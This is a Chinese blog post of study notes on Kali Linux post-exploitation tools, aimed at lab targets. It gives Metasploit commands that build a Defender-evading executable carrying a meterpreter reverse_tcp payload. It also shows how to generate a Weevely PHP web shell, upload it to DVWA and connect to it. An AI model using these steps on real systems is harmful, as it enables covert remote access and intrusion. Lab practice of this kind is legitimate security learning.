kali里的powersploit、evasion、weevely等工具的杂项记录

这篇博客介绍了如何在Kali Linux中使用PostExploitation工具,特别是OSBackdoors,启动Python Web服务器,并在Windows测试机上利用Powershell进行免杀攻击。通过Metasploit框架展示如何选择免杀模块,设置参数并执行payload。此外,还讲解了如何创建并使用PHP网页木马Weevely,以及如何在靶机上上传和激活。博客还提到了文件隐藏和远程操作命令的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具

点击后其实是进入一个目录

 然后利用python启动一个WEB服务器

在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000

msf框架里的evasion

  • msfconsole
  • show evasion   // 查看免杀模块

  •  use evasion/windows/windows_defender_exe
  • show options   // 查看参数

  • set filename test.exe   //自己定义一个文件名,不然是随机起名 
  • set payload windows/meterpreter/reverse_tcp
  • run

 这是一个隐藏目录

可以使用命令  

将文件移动到可视位置 

学习时可以扔到https://www.virscan.org等平台检测一下

weevely只能生成PHP的网页木马 在kali里执行

weevely generate 123456 /home/kali/test.php

其中123456是密码 

到靶机dvwa上传

上传成功后,根据页面提示的路径访问一下木马网页

 回到kali,执行 

  • weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
  • 密码要放在最后,且须与前面设置的一致

输入  help 查看可用的远程操作的命令

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值